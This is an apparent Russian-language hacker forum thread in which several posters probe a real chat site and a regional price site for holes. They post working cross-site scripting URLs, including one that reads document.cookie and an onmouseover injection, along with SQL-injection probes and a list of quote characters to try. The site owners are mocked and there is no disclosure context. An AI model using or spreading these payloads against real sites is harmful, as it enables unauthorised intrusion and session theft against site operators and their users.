чат сто пудово самописный, стока там наверченно, щаз глянем! и ваще! надо блин зарегать несколько ников, а то лень регаться
http://www.yellow.su/sys/registration.phtml?nick=%22%3E%3Cscript%3Ealert()%3C/script%3E http://www.yellow.su/sys/index.phtml просто ошибка вылезает http://www.yellow.su/?act=room&sid=7466918146&room=4' уже другая ошибка http://yellow.su/?act=room&sid=8105585192&room=55
Хы я так понял то админ чата %) http://www.yellow.su/sys/registration.phtml?nick=script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.chelny.info/price3.phtml?check_net=&check_email='&check_zip='&check_credit='&check_map='&find1=&selhref=&selpost=&city='&kateg1=%FD18&kateg2='&page='
Да там вабде ПОПА!!)) я за 10 минут, пока чай пил, стока накалупал..а есиб дальше...аж страшно плин! символы для скул: '",%00',%27 и т.д. )) к нику, полу ,возрасту...похрен )) http://www.yellow.su:80/sys/?str=top&sel_by=1&expar%5B0%5D=>"><ScRiPt%20%0a%0d>alert(1)%3B</ScRiPt>&gender=%2527&[email protected]&by=0
2 gemaglabin Верняк)) я тож так понял)) http://www.yellow.su:80/sys/?str=top&sel_by=1&expar%5B0%5D=0&gender=%2527&nick="+onmouseover="alert(1141737531)&by=0 круто выглядит))
http://www.yellow.su/sys/left.phtml?&expar[0]=%22%3E%3Cscript%3Ealert()%3C/script%3E&sid=1425734781 наверное там ещё куча чего но мне надоело нет вот последняя)) http://www.yellow.su/sys/grpwork.phtml?expar[1]=1&sid=1425734781&expar[2]=322575'
Слышь, топик стартер, запусти сканер какой нить - и смари!!! А то мы тему во флудилку превратим))) одна дыра за другой.... Так ты реальна админ?
Щас наверно топикстартер побежал перед админом выламыватся, что это он всё нашёл. Хотя я могу и ошибатся. В общем уязвимости нашли, тема закрыта.
